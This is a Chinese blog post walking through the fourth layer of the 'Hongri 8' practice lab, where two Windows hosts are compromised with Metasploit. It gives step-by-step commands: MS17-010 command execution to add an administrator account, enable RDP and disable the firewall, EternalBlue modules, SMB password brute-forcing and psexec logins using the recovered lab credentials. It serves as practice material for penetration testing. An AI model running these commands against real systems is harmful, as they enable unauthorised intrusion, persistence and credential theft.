红日8第四层(两台)

最新推荐文章于 2024-09-14 21:10:44 发布
最新推荐文章于 2024-09-14 21:10:44 发布
阅读量701 收藏 15
点赞数 18
文章标签: web安全 安全 网络安全 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62915924/article/details/137396252
版权

第四层(DC)  20.11.11.129 +一个nat网卡对外访问的192.168.75.136(前面扫描到这个是windows-server2012)

在第三层过来时记得加上网段然后就可以用nmap扫描发现了 135,445,139等端口,漏洞扫描发现了ms17_010


用模块扫描一下发现了真的有ms17_010

use 0  到use 1 都不行(怀疑有那个防火墙)
use 2可以执行 命令执行

use auxiliary/admin/smb/ms17_010_command 
set rhost 20.11.11.129
set command  net user      (尝试一下看用户)
run

set command net user zgx620 zgx@620  /add   (添加用户)
run  

set  command net localgroup administrators  zgx620  /add  (添加到管理组)
run

set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'    (开3389端)

set command netsh advfirewall set allprofiles state off #关闭防火墙  (这个关掉才可以永恒之蓝use 1成功)

use 1
set  rhosts 20.11.11.129
set lhost 192.168.75.131
run(成功)

use 0
set  rhosts 20.11.11.129
set lhost 192.168.75.131
run(成功)

第二种
如果想尝试远程就得去计算机里面把那个只允许同网段的连接关掉,才可以远程
rdesktop    20.11.11.129

第三种用

use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 20.11.11.129
set smbuser /roo/Desktop/a.txt
run可以            (可以跑出密码) (用字典去跑,可能会跑很久)

 用smb凭证攻击试试
use exploit/windows/smb/psexec
set smbuser   zgx620
set smbpass  zgx@620
set rhosts 192.168.75.136
set lhost 192.168.75.131         (可以得到权限)这个也是需要那个nat网卡才可以成功(这个是我添加的用命令执行)

第四层第二台pc 20.11.11.131+nat外网192.168.75.138


用那个fscan扫描发现这个是windows 8.1  x86 32位 开放135,139,445端口
可以尝试永恒之蓝 ,kerberos域渗透
后面用nmap ,跟永恒之蓝模块扫描发现有ms17_010的漏洞
使用 use0,use1,use2都不行

尝试域渗透kerberos 发现可以生成高凭证可以注入但是有一个问题那个20.11.11.129(DC执行但是20.11.11.131不行)

最后用那个smb凭证尝试

use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt   (这个用字典跑,一般管理员都是对应的adminstrator所以猜测)
set rhosts 20.11.11.131
set smbuser adminstrator
run可以 
(账号密码是 administrator    admin@123) 

 
use exploit/windows/smb/psexec
set smbuser   administrator
set smbpass  admin@123
set rhosts 20.11.11.131
set lhost 192.168.75.131
set SMB::AlwaysEncrypt false    
set SMB::ProtocolVersion 1
(因为这个是32位的所以不能加上x64) 可以得到权限

(这两个是针对Exploit failed [disconnected]: RubySMB::Error::EncryptionError Communication error with the remote host: An error occurred reading from the Socket Connection reset by peer. The server supports encryption but was not able to handle the encrypted request.)那两个smb


(注意这台有问题需要把防火墙关掉否则ping不通但是又是黑盒测试不知道密码,用那个刷机软件去刷一下可以自己设置密码在桌面上面)
这个是刷机的东西针对windows
爱因斯坦95
关注
渗透系列:红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记(拿下win2008s)
weixin_54626591的博客
01-18 212
红日靶场(vulnstack)一 超全面详细的渗透测试学习笔记(拿下win2008s)
红日安全内网渗透笔记
VB551的博客
04-10 4704
靶场下载地址:漏洞详情 环境配置参考:【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园 此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC 第一步:信息收集 已知WEB机的IP地址,用syn包进行扫描。 nmap -sS -v 192.168.111.80 获得端口开放 ...
windows ms08-067 “ Ruby SMB加密错误”
m0_46377671的博客
01-27 975
使用vulhub在做ms08-067复现时,一直报错 困扰了很久,翻墙找到了解决方法, 在msfconsole中 set SMB::AlwaysEncrypt false set SMB::ProtocolVersion 1 原因好像是: 这可能有许多不同的原因。但是,常见的原因是客户端和服务器使用不同的协议版本,因此使用不同的SMB方言(例如SMBv1,SMBv2和SMBv3)相互“讲话”。幸运的是,可以在Metasploit中设置SMB协议版本。为此,所需的版本号仅需要存储在设置“ SMB :: P
红日8 实战篇章(第二层)
weixin_62915924的博客
03-24 2195
这个是第一层的第一台ip为一个nat网卡同网段加上与第二层连接的ip我的是192.168.75.135 +192.168.3.0/24(属于192.168.3.0/24网段的ip)这个是第二层的(一共五台)这个五台分为四部分虽然是四部分但是都是属于 192.168.3.0/24(网段)账号密码都在那个虚拟机的进入界面第一部分的 192.168.3.77+192.168.3.76第二部分的 192.168.3.75第三部分的 192.168.3.144。
红日靶场
qq_50696533的博客
12-29 3842
红日靶场4大家好红日安全红队靶场(四)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞,希望大家多多利用。靶场学习路径,可参考 struts2 漏洞利用 tomcat 漏洞利用 phpmyadmin getshell docker逃逸 ms14-068 ssh密钥利用 流量转发 历史命令信息泄露 域渗透。利用永恒之蓝获得win7 mimikatz抓取密码 利用Kerberos 域用户提权漏洞获得域
红日靶场1
woshicainiao666的博客
01-13 1602
我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中。net config workstation ---------查看当前的域的信息。net view /domain ---------查看本机的域。第一个网卡选择------VMwear1(仅主机模式)net time /domain ----------查找域控。net view ---------查看当前域中计算机的名称。
ATT&CK红队评估(红日靶场四)
weixin_45682839的博客
04-28 5572
ATT&CK红队评估(红日靶场四)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
红队攻防知识分享-红日安全团队靶场1
beirry的博客
03-23 9145
环境搭建 靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境拓扑图: 以下是虚拟机网络配置 虚拟机 网络配置 Windows7 x64 VMnet1:192.168.52.128;VMnet2:192.168.54.128 Win2k3 Measploitable VMnet1:192.168.52.141 Windows Server 2008 R2 x64 VMnet1:192.168.52.138 kali V
ATT&CK红队评估(红日靶场三)
weixin_45682839的博客
04-25 3506
ATT&CK红队评估(红日靶场三)通关,拿下所有五台主机,包括:Centos、Ubantu、Windows xp、Windows 2008、Windows 2012
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
09-14 2213
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1929
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 659
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-14 807
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
Java代码审计篇 | ofcms系统审计思路讲解 - 篇4 | XXE漏洞审计
最新发布
哦 卷!
09-14 415
我发现很多文章包括教程,大概套路是:只说有漏洞的点,将有漏洞的点指出,然后分析代码;或者黑盒测试出漏洞之后,然后分析代码。我认为这是在分析漏洞代码,而非代码审计。代码审计文章或教程应该是从0开始找到漏洞所在,包括思路!所以这里不管有没有漏洞,我都会把审计过程写出来,因此篇幅会很长,但我认为这样对你会很有帮助。知其然亦知所以然。XXE漏洞审计Java代码审计篇 | ofcms系统审计思路讲解 - 篇1 | 环境搭建、路由机制。
网络安全 DVWA通关指南 DVWA SQL Injection (Blind SQL盲注)
YueXuan_521的博客
09-14 792
这篇文章是关于网络安全DVWA(Damn Vulnerable Web Application)的SQL注入挑战指南,主要介绍了Low、Medium、High和Impossible四个安全级别的SQL盲注攻击方法。Low级别通过直接构造SQL语句获取数据库信息;Medium级别使用ASCII码值绕过单引号转义;High级别使用布尔盲注和Cookie传参,并有限制查询结果;Impossible级别通过参数化查询和CSRF令牌防御SQL注入。文章详细展示了攻击步骤和防御措施,帮助读者理解
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-09 1521
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-08 1666
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
红日靶场下载csdn
08-13
红日靶场是一个很受欢迎的网络安全实验平台,用于学习和锻炼网络攻防技术。由于该平台所提供的安全实验环境包含了许多常见的漏洞和攻击场景,因此在安全爱好者和专业人士中间都非常受欢迎。 要下载红日靶场,首先...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值